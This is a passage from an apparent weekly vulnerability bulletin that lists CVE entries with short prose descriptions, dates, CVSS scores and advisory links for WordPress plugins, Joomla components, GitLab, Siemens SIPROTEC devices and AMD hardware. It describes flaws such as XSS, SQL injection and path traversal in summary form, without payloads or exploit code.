| Wplearnmanager--WP Learn Manager | WP Learn Manager 1.1.2 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the fieldtitle parameter. Attackers can submit POST requests to the jslm_fieldordering page with XSS payloads in the fieldtitle field to execute arbitrary JavaScript when administrators view the field ordering interface. | 2026-05-16 | 7.2 | CVE-2021-47975 | ExploitDB-50086 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin WP Learn Manager 1.1.2 Stored XSS |
| Gotmls--Malware Security and Bruteforce Firewall | WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the file parameter. Attackers can send requests to the duplicator_download action via admin-ajax.php with path traversal sequences to access sensitive system files outside the intended directory. | 2026-05-16 | 7.5 | CVE-2021-47977 | ExploitDB-50107 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Anti-Malware Security Bruteforce Firewall 4.20.59 Directory Traversal |
| Getfuelcms--Fuel CMS | Fuel CMS 1.4.13 contains a blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'col' parameter in the Activity Log interface. Attackers can send requests to the logs endpoint with malicious SQL payloads in the 'col' parameter to extract database information based on response time delays. | 2026-05-16 | 7.1 | CVE-2021-47980 | ExploitDB-50523 Official Product Homepage Product Reference VulnCheck Advisory: Fuel CMS 1.4.13 Blind SQL Injection via col Parameter |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.5 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by sending specially crafted payloads on certain API endpoints. | 2026-05-14 | 7.5 | CVE-2025-14869 | HackerOne Bug Bounty Report #3447146 https://gitlab.com/gitlab-org/gitlab/-/work_items/584489 https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.5 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by sending specially crafted JSON payloads due to insufficient input validation. | 2026-05-14 | 7.5 | CVE-2025-14870 | HackerOne Bug Bounty Report #3446641 https://gitlab.com/gitlab-org/gitlab/-/work_items/584490 https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Simple-Fields--Simple Fields | Simple Fields 0.2 through 0.3.5 WordPress Plugin contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by injecting null bytes into the wp_abspath parameter on PHP versions before 5.3.4. Attackers can supply malicious wp_abspath values to simple_fields.php to include files like /etc/passwd or inject PHP code into Apache logs for remote code execution when allow_url_include is enabled. | 2026-05-17 | 6.2 | CVE-2018-25324 | ExploitDB-44425 Official Product Homepage Product Reference VulnCheck Advisory: Simple Fields 0.2-0.3.5 Local File Inclusion via wp_abspath |
| zenar--Zenar Content Management System | Zenar Content Management System contains a cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating form parameters in POST requests. Attackers can inject script tags through the current_page parameter sent to the ajax.php endpoint, which reflects unsanitized user input in the response HTML to execute arbitrary JavaScript in victim browsers. | 2026-05-17 | 6.1 | CVE-2018-25331 | ExploitDB-44664 Official Product Homepage Product Reference VulnCheck Advisory: Zenar Content Management System Cross-Site Scripting via ajax.php |
| Powie--WHOIS Domain Check | Powie's WHOIS Domain Check 0.9.31 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by exploiting unsanitized input fields in plugin settings. Attackers can submit malicious payloads through textarea and input elements in the pwhois_settings.php configuration page to execute JavaScript in the admin context and escalate privileges. | 2026-05-13 | 6.4 | CVE-2020-37225 | ExploitDB-48656 Official Product Homepage Official Product Homepage Product Reference VulnCheck Advisory: Powie's WHOIS Domain Check 0.9.31 Persistent Cross-Site Scripting |
| Wordpress--Buddypress | WordPress Plugin Buddypress 6.2.0 contains a persistent cross-site scripting vulnerability that allows authenticated attackers with moderator privileges to inject malicious script code through the figure parameter in wp:html blocks. Attackers can inject iframe elements with event handlers like onload that execute when administrators or privileged users preview or view the affected page content, enabling session hijacking and persistent phishing attacks. | 2026-05-16 | 6.4 | CVE-2020-37233 | ExploitDB-49061 Official Product Homepage VulnCheck Advisory: WordPress Plugin Buddypress 6.2.0 Persistent Cross-Site Scripting |
| Internetdownloadmanager--Internet Download Manager | Internet Download Manager 6.38.12 contains a buffer overflow vulnerability in the Scheduler component that allows local attackers to crash the application by supplying oversized input. Attackers can paste malicious data exceeding 5000 bytes into the 'Open the following file when done' field to trigger a denial of service condition. | 2026-05-16 | 6.2 | CVE-2020-37234 | ExploitDB-49083 Official Product Homepage Product Reference VulnCheck Advisory: Internet Download Manager 6.38.12 Scheduler Buffer Overflow |
| themeftc--Theme Wibar | WordPress Theme Wibar 1.1.8 contains a stored cross-site scripting vulnerability in the Brand component that allows authenticated users to inject malicious scripts by manipulating the Logo URL parameter. Attackers with editor, administrator, contributor, or author privileges can inject base64-encoded script payloads through the ftc_brand_url input field to execute arbitrary JavaScript when users visit the brand page. | 2026-05-16 | 6.4 | CVE-2020-37235 | ExploitDB-49107 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Theme Wibar 1.1.8 Stored Cross-Site Scripting via Brand Component |
| Netartmedia--NewsLister | NewsLister contains an authenticated persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through the title parameter in the news addition interface. Attackers can inject JavaScript payloads via the title field in the admin panel that execute when news items are viewed by other users. | 2026-05-16 | 6.4 | CVE-2020-37236 | ExploitDB-49160 Official Product Homepage VulnCheck Advisory: NewsLister Authenticated Persistent Cross-Site Scripting via Admin Panel |
| Compo--Composr CMS | Composr CMS 10.0.34 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through the banner management interface. Attackers with admin credentials can inject XSS payloads in the Description field of the Add banner functionality, which execute for all website visitors when they access the home page. | 2026-05-16 | 6.4 | CVE-2020-37237 | ExploitDB-49190 Official Product Homepage Product Reference VulnCheck Advisory: Composr CMS 10.0.34 Persistent Cross-Site Scripting via banners |
| Cmsmadesimple--CMS Made Simple | CMS Made Simple 2.2.15 contains a stored cross-site scripting vulnerability that allows authenticated users with Content Manager access to inject malicious scripts through SVG file uploads. Attackers can upload SVG files containing embedded JavaScript to the file manager, which executes when other authenticated users access the uploaded file, enabling cookie theft and session hijacking. | 2026-05-16 | 6.4 | CVE-2020-37238 | ExploitDB-49199 Official Product Homepage Product Reference VulnCheck Advisory: CMS Made Simple 2.2.15 Stored XSS via SVG File Upload |
| Codekernel--Queue Management System | Queue Management System 4.0.0 contains a stored cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through user creation fields. Attackers can insert JavaScript payloads in the First Name, Last Name, and Email fields during user creation, which execute when viewing the User List page. | 2026-05-16 | 6.4 | CVE-2020-37240 | ExploitDB-49296 Official Product Homepage Product Reference VulnCheck Advisory: Queue Management System 4.0.0 Stored XSS via Add User |
| Supsystic--Backup | Supsystic Backup 2.3.9 contains a local file inclusion vulnerability that allows unauthenticated attackers to read and delete arbitrary files by manipulating the download path parameter. Attackers can modify the download parameter in admin.php requests with directory traversal sequences to access sensitive files like /etc/passwd or delete files via the removeAction parameter. | 2026-05-16 | 6.2 | CVE-2020-37246 | ExploitDB-49545 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Backup 2.3.9 Local File Inclusion |
| Cookielawinfo--Cookie Law Bar | Cookie Law Bar 1.2.1 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting unsanitized input to the Bar Message field. Attackers can inject script payloads through the plugin settings page that execute in the browsers of all WordPress users viewing the site, enabling cookie theft and sensitive data exfiltration. | 2026-05-16 | 6.4 | CVE-2021-47957 | ExploitDB-49905 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Cookie Law Bar 1.2.1 Stored XSS via clb_bar_msg |
| savsofts--Savsoft Quiz | Savsoft Quiz 5.0 contains a persistent cross-site scripting vulnerability in the user account settings page that allows authenticated attackers to inject malicious HTML and JavaScript code. Attackers can inject script payloads into user profile fields at the edit_user endpoint, which execute in the browsers of users viewing the affected profile after submission. | 2026-05-15 | 6.4 | CVE-2021-47962 | ExploitDB-49825 Official Product Homepage Product Reference VulnCheck Advisory: Savsoft Quiz 5.0 Persistent Cross-Site Scripting via User Settings |
| Timeclock--PHP Timeclock | PHP Timeclock 1.04 contains multiple cross-site scripting vulnerabilities that allow unauthenticated attackers to inject arbitrary JavaScript by manipulating URL paths and POST parameters. Attackers can append malicious payloads to login.php, timeclock.php, audit.php, and timerpt.php endpoints, or inject code through from_date and to_date parameters in report requests to execute scripts in user browsers. | 2026-05-15 | 6.1 | CVE-2021-47967 | ExploitDB-49853 Official Product Homepage Product Reference VulnCheck Advisory: PHP Timeclock 1.04 Multiple Cross-Site Scripting via Parameters |
| Podcastgenerator--Podcast Generator | Podcast Generator 3.1 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting unfiltered JavaScript code in the long_description parameter. Attackers can inject script tags through episode creation or editing requests to execute arbitrary JavaScript when other users view the episode details. | 2026-05-15 | 6.4 | CVE-2021-47968 | ExploitDB-49866 Official Product Homepage Product Reference VulnCheck Advisory: Podcast Generator 3.1 Persistent Cross-Site Scripting via long_description |
| Processmaker--ProcessMaker | ProcessMaker 3.5.4 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting improper path traversal validation. Attackers can send requests with directory traversal sequences to access sensitive system files like /etc/passwd without authentication. | 2026-05-16 | 6.2 | CVE-2021-47978 | ExploitDB-50229 Official Product Homepage VulnCheck Advisory: ProcessMaker 3.5.4 Local File Inclusion via Path Traversal |
| interactivegeomaps--MapGeo Interactive Geo Maps | The MapGeo - Interactive Geo Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'map' parameter in the display-map shortcode in all versions up to, and including, 1.6.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-14 | 6.1 | CVE-2025-15345 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bfccbf41-c861-4bf1-b400-7858cb255b9a?source=cve https://research.cleantalk.org/cve-2025-15345 https://plugins.trac.wordpress.org/changeset?old_path=/interactive-geo-maps/tags/1.6.27/src/Plugin/Map.php&new_path=/interactive-geo-maps/tags/1.6.28/src/Plugin/Map.php |
| hwk-fr--Advanced Custom Fields: Extended | The The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.9.2.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2026-05-12 | 6.5 | CVE-2025-15463 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f8544784-1994-47e2-be39-568d0ab9ee00?source=cve https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-action-email.php#L111 https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-front-render.php#L35 |
| Joomsky--JS Jobs | Joomla! Component Js Jobs 1.2.0 contains a cross-site request forgery vulnerability that allows attackers to perform state-changing actions without token validation. Attackers can craft malicious HTML forms targeting administrative endpoints like job.jobenforcedelete to delete job entries or modify component settings when administrators visit attacker-controlled pages. | 2026-05-17 | 5.3 | CVE-2018-25327 | ExploitDB-44492 Official Product Homepage Product Reference VulnCheck Advisory: Joomla! Component Js Jobs 1.2.0 Cross-Site Request Forgery |
| Bylancer--Zechat | Zechat 1.5 contains a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to change a user's information by bypassing anti-CSRF protections. The application uses a CSRF token, but an attacker can use the hashtag parameter to inject an encoded payload and bypass the CSRF protection, allowing for unauthorized changes to user data. This can be exploited by tricking a user into submitting a crafted form or by using a script to obtain and set the CSRF token. | 2026-05-17 | 5.4 | CVE-2018-25334 | ExploitDB-44685 Official Product Homepage VulnCheck Advisory: Zechat 1.5 Cross-Site Request Forgery (CSRF) via hashtag parameter |
| Joomlaextensions--Joomla! extension jCart for OpenCart | Joomla jCart for OpenCart 2.3.0.2 contains a cross-site request forgery vulnerability that allows attackers to modify user account information without authentication. Attackers can craft malicious HTML forms targeting endpoints , and to change user credentials, passwords, and affiliate account details when victims visit the attacker-controlled page. | 2026-05-17 | 5.3 | CVE-2018-25336 | ExploitDB-44788 Official Product Homepage Product Reference VulnCheck Advisory: Joomla jCart for OpenCart 2.3.0.2 Cross-Site Request Forgery |
| Ultimate Member--ultimate-member | WordPress Plugin ultimate-member 2.1.3 contains a local file inclusion vulnerability that allows authenticated attackers to include arbitrary files by manipulating the pack parameter in class-admin-upgrade.php. Attackers can send POST requests with malicious pack values to include unintended PHP files from the packages directory and execute arbitrary code. | 2026-05-13 | 5.5 | CVE-2020-37169 | ExploitDB-48065 VulnCheck Advisory: WordPress Plugin ultimate-member 2.1.3 Local File Inclusion |
| HUSKY--Products Filter Professional for WooCommerce | WOOF Products Filter for WooCommerce 1.2.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by entering XSS payloads in design tab textfields. Attackers can inject JavaScript code through fields like 'Text for block toggle' and 'Custom front css styles' that executes on frontend pages when saved, affecting all site visitors. | 2026-05-13 | 5.5 | CVE-2020-37174 | ExploitDB-48088 Official Product Homepage Product Reference VulnCheck Advisory: WOOF Products Filter for WooCommerce 1.2.3 Persistent XSS |
| Bloofox--bloofoxCMS | bloofoxCMS 0.5.2.1 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions by tricking logged-in users into visiting malicious pages. Attackers can craft hidden forms targeting the admin user creation endpoint to add new administrative accounts with arbitrary credentials without requiring explicit user consent. | 2026-05-16 | 5.3 | CVE-2020-37241 | ExploitDB-49507 Official Product Homepage Product Reference VulnCheck Advisory: bloofoxCMS 0.5.2.1 Cross-Site Request Forgery via user add |
| MyBB--MyBB Timeline Plugin | MyBB Timeline Plugin 1.0 contains cross-site scripting vulnerabilities that allow attackers to inject malicious scripts through thread titles, post content, and user profile fields like Location and Bio. Attackers can also exploit a cross-site request forgery vulnerability in the timeline.php profile action to change a user's cover picture by crafting malicious forms that execute when victims visit affected profiles. | 2026-05-16 | 5.3 | CVE-2021-47934 | ExploitDB-49467 Product Reference VulnCheck Advisory: MyBB Timeline Plugin 1.0 Cross-Site Scripting and CSRF |
| CouchCMS--CouchCMS | CouchCMS 2.2.1 contains a cross-site scripting vulnerability that allows authenticated attackers to execute arbitrary JavaScript by uploading malicious SVG files through the file upload functionality. Attackers can upload SVG files containing embedded script tags to the browse.php endpoint, which are then executed in users' browsers when the files are accessed or previewed. | 2026-05-16 | 5.4 | CVE-2021-47955 | ExploitDB-49636 Official Product Homepage VulnCheck Advisory: CouchCMS 2.2.1 Cross-Site Scripting via SVG File Upload |
| Opensolution--Quick.CMS | Quick.CMS 6.7 contains a cross-site scripting vulnerability in the sliders form that allows authenticated attackers to inject malicious scripts by submitting XSS payloads through the sDescription parameter. Attackers can craft CSRF forms targeting the admin.php?p=sliders-form endpoint to execute arbitrary JavaScript in victim browsers when the form is submitted. | 2026-05-16 | 5.4 | CVE-2021-47981 | ExploitDB-50530 Official Product Homepage Product Reference VulnCheck Advisory: Quick.CMS 6.7 Cross-Site Scripting via CSRF to Sliders Form |
| WSO2--WSO2 Identity Server | The check user account lock states feature within the email OTP flow fails to validate user input, allowing an attacker to infer the existence of registered user accounts. The discovery of valid usernames can increase the risk of brute-force and social engineering attacks. Attackers can leverage this information to craft targeted phishing campaigns or other malicious activities aimed at tricking users into divulging sensitive data, potentially damaging the organization's reputation and leading to regulatory non-compliance and financial consequences. | 2026-05-11 | 5.3 | CVE-2024-0391 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3115/ |
| Siemens--SIPROTEC 5 6MD84 (CP300) | A vulnerability has been identified in SIPROTEC 5 6MD84 (CP300) (All versions < V11.0), SIPROTEC 5 6MD85 (CP200) (All versions), SIPROTEC 5 6MD85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 6MD86 (CP200) (All versions), SIPROTEC 5 6MD86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 6MD89 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 6MU85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7KE85 (CP200) (All versions), SIPROTEC 5 7KE85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SA82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SA82 (CP150) (All versions < V11.0), SIPROTEC 5 7SA84 (CP200) (All versions), SIPROTEC 5 7SA86 (CP200) (All versions), SIPROTEC 5 7SA86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SA87 (CP200) (All versions), SIPROTEC 5 7SA87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SD82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SD82 (CP150) (All versions < V11.0), SIPROTEC 5 7SD84 (CP200) (All versions), SIPROTEC 5 7SD86 (CP200) (All versions), SIPROTEC 5 7SD86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SD87 (CP200) (All versions), SIPROTEC 5 7SD87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SJ81 (CP100) (All versions >= V7.80), SIPROTEC 5 7SJ81 (CP150) (All versions < V11.0), SIPROTEC 5 7SJ82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SJ82 (CP150) (All versions < V11.0), SIPROTEC 5 7SJ85 (CP200) (All versions), SIPROTEC 5 7SJ85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SJ86 (CP200) (All versions), SIPROTEC 5 7SJ86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SK82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SK82 (CP150) (All versions < V11.0), SIPROTEC 5 7SK85 (CP200) (All versions), SIPROTEC 5 7SK85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SL82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SL82 (CP150) (All versions < V11.0), SIPROTEC 5 7SL86 (CP200) (All versions), SIPROTEC 5 7SL86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SL87 (CP200) (All versions), SIPROTEC 5 7SL87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SS85 (CP200) (All versions), SIPROTEC 5 7SS85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7ST85 (CP200) (All versions), SIPROTEC 5 7ST85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7ST86 (CP300) (All versions < V11.0), SIPROTEC 5 7SX82 (CP150) (All versions < V11.0), SIPROTEC 5 7SX85 (CP300) (All versions < V11.0), SIPROTEC 5 7SY82 (CP150) (All versions < V11.0), SIPROTEC 5 7UM85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7UT82 (CP100) (All versions >= V7.80), SIPROTEC 5 7UT82 (CP150) (All versions < V11.0), SIPROTEC 5 7UT85 (CP200) (All versions), SIPROTEC 5 7UT85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7UT86 (CP200) (All versions), SIPROTEC 5 7UT86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7UT87 (CP200) (All versions), SIPROTEC 5 7UT87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7VE85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7VK87 (CP200) (All versions), SIPROTEC 5 7VK87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7VU85 (CP300) (All versions < V11.0), SIPROTEC 5 Compact 7SX800 (CP050) (All versions < V11.0). Affected devices do not use sufficiently random values to create session identifiers. This could allow an unauthenticated remote attacker to brute force a session identifier and gain read access to limited information from the web server without authorization. | 2026-05-12 | 5.3 | CVE-2024-54017 | https://cert-portal.siemens.com/productcert/html/ssa-786884.html |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.11 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user to inject HTML and JavaScript into email notifications sent to other users due to improper input sanitization. | 2026-05-14 | 5.4 | CVE-2025-12669 | HackerOne Bug Bounty Report #3368096 https://gitlab.com/gitlab-org/gitlab/-/work_items/579385 https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ |
| ghera74--ilGhera Support System for WooCommerce | The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_ticket_content_callback' function in all versions up to, and including, 1.3.0. This makes it possible for unauthenticated attackers to view any support ticket content, including sensitive customer information and private communications, by providing a ticket ID. | 2026-05-13 | 5.3 | CVE-2025-14033 | https://www.wordfence.com/threat-intel/vulnerabilities/id/40ceea17-ec60-4775-8495-e2f7643d1b7c?source=cve https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L68 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L68 https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L643 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L643 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.3.1/includes/class-wc-support-system.php#L780 |
| stylemix--Cost Calculator Builder | The Cost Calculator Builder plugin for WordPress is vulnerable to Unauthenticated Price Manipulation and Insecure Direct Object Reference (IDOR) in all versions up to, and including, 4.0.1 only when used in combination with Cost Calculator Builder PRO. This is due to the ccb_woocommerce_payment AJAX action being registered via wp_ajax_nopriv, making it accessible to unauthenticated users, and the renderWooCommercePayment() function passing user-controlled data directly to CCBWooCheckout::init() without authorization checks. This makes it possible for unauthenticated attackers to add WooCommerce products to their cart with attacker-controlled prices. | 2026-05-13 | 5.3 | CVE-2025-14755 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe684f43-8442-4b29-84a8-da8c6863e62b?source=cve https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBOrderController.php#L484 https://plugins.trac.wordpress.org/browser/cost-calculator-builder/tags/3.6.7/includes/classes/CCBAjaxAction.php#L99 |
| wpclever--WPC Badge Management for WooCommerce | The WPC Badge Management for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'text' attribute of the `wpcbm_best_seller` shortcode in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-13 | 5.5 | CVE-2025-14767 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bf02edc9-2bb6-4ceb-b2a1-63f95c8becb3?source=cve https://wordpress.org/plugins/wpc-badge-management https://plugins.trac.wordpress.org/browser/wpc-badge-management/trunk/includes/class-shortcode.php#L98 https://plugins.trac.wordpress.org/changeset/3519100/ |
| Tp-link--TL-WR720NMbps Wireless N Router | TP-Link TL-WR720N wireless router contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized administrative actions by crafting malicious web requests. Attackers can modify port forwarding rules via VirtualServerRpm.htm or change WiFi security settings via WlanSecurityRpm.htm by tricking authenticated users into visiting attacker-controlled pages. | 2026-05-17 | 4.3 | CVE-2018-25321 | ExploitDB-44335 Official Product Homepage Product Reference VulnCheck Advisory: TP-Link TL-WR720N All Versions CSRF via Administrative Interfaces |
| Joomlaextensions--Joomla! extension JoomOCShop | Joomla JoomOCShop 1.0 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized actions on behalf of authenticated users. Attackers can craft malicious HTML forms targeting account endpoints like /joomoc2/?route=account/edit and to modify user information or reset passwords without user consent. | 2026-05-17 | 4.3 | CVE-2018-25337 | ExploitDB-44789 Official Product Homepage Product Reference VulnCheck Advisory: Joomla JoomOCShop 1.0 Cross-Site Request Forgery |
| Easy2pilot-v7--Easy2Pilot | Easy2Pilot 7 contains a cross-site request forgery vulnerability that allows attackers to add unauthorized user accounts by tricking authenticated administrators into visiting malicious pages. Attackers can craft HTML forms targeting the admin.php?action=add_user endpoint with POST requests containing username and password parameters to create new administrative accounts without explicit user consent. | 2026-05-13 | 4.3 | CVE-2020-37217 | ExploitDB-48099 Official Product Homepage VulnCheck Advisory: Easy2Pilot 7 Cross-Site Request Forgery via admin.php |
| CouchCMS--CouchCMS | CouchCMS 2.2.1 contains a server-side request forgery vulnerability that allows authenticated attackers to make arbitrary HTTP requests by uploading malicious SVG files. Attackers can upload SVG files containing external entity references through the browse.php endpoint to access internal services and resources. | 2026-05-15 | 4.3 | CVE-2021-47958 | ExploitDB-49675 Official Product Homepage VulnCheck Advisory: CouchCMS 2.2.1 Server-Side Request Forgery via SVG upload |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.1 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user with Guest permissions to view issues in projects they were not authorized to access. | 2026-05-14 | 4.3 | CVE-2025-13874 | HackerOne Bug Bounty Report #3445398 https://gitlab.com/gitlab-org/gitlab/-/work_items/582634 https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| There were no low vulnerabilities recorded this week. | |||||
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AMD--AMD Ryzen 5000 Series Desktop Processors with Radeon Graphics | A compromised Trusted OS (TOS) driver could issue a malformed call that could potentially allow memory access outside the intended range resulting in loss of integrity. | 2026-05-15 | not yet calculated | CVE-2021-26380 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD--AMD Ryzen 3000 Series Mobile Processors with Radeon Graphics | A TOCTOU (Time-Of-Check to Time-Of-Use) in the graphics interface may allow an attacker to load registers repeatedly creating a race condition potentially leading to a loss of integrity. | 2026-05-15 | not yet calculated | CVE-2022-23826 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| KMX--Alien::FreeImage | Alien::FreeImage versions through 1.001 for Perl contains several vulnerable libraries. Alien::FreeImage contains version 3.17.0 of the FreeImage library from 2017, which has known vulnerabilities such as CVE-2015-0852 and CVE-2025-65803. The library embeds other images libraries that also have known vulnerabilities. | 2026-05-11 | not yet calculated | CVE-2022-4988 | https://freeimage.sourceforge.io/ https://metacpan.org/release/KMX/Alien-FreeImage-1.001/source/src/Source https://nvd.nist.gov/vuln/detail/CVE-2015-0852 https://nvd.nist.gov/vuln/detail/CVE-2025-65803 https://github.com/kmx/alien-freeimage/issues/4 https://github.com/kmx/alien-freeimage/issues/5 |
| n/a--MK-Auth 23.01K4.9 | An arbitrary file upload vulnerability in MK-Auth 23.01K4.9 allows attackers to execute arbitrary code via uploading a crafted PHP file. | 2026-05-12 | not yet calculated | CVE-2023-27753 | https://github.com/yueslly/MKAUTH-RCE/blob/main/README.md https://github.com/yueslly/MKAUTH-RCE |
| n/a--MK-Auth 23.01K4.9 | An insecure direct object reference in MK-Auth 23.01K4.9 allows attackers to access and send support calls for other users via manipulation of the chamado parameter through a crafted GET request. | 2026-05-12 | not yet calculated | CVE-2023-30059 | https://github.com/yueslly/MKAUTH-IDOR |
| AMD[.]com--AMD Radeon RX 6000 Series Graphics Products | Improper validation in Power Management Firmware (PMFW) may allow an attacker with privileges to pass malformed workload arguments when exporting table data from SMU to DRAM potentially resulting in a loss of confidentiality and/or availability. | 2026-05-15 | not yet calculated | CVE-2023-31309 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Ryzen 5000 Series Mobile Processors with Radeon Graphics | Improperly preserved integrity of hardware configuration state during a power save/restore operation in the AMD Secure Processor (ASP) could allow an attacker with the ability to write outside the trusted memory range (TMR) to change the execution flow of the Video Core Next (VCN) firmware potentially impacting confidentiality, integrity, or availability. | 2026-05-15 | not yet calculated | CVE-2023-31316 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Radeon RX 6000 Series Graphics Products | Improper restriction of operations within the bounds of a memory buffer in the AMD secure processer (ASP) could allow an attacker to read or write to protected memory potentially resulting in arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2023-31317 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Instinct MI300X | An out of bounds read in the remote management firmware could allow a privileged attacker read a limited section of memory outside of established bounds potentially resulting in loss of confidentiality or availability. | 2026-05-15 | not yet calculated | CVE-2024-21950 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD EPYC 4005 Series Processors | Improper Input Validation in the AMD RAID driver could allow an attacker to point to an arbitrary memory location potentially resulting in privilege escalation and arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2024-21962 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4016.html |
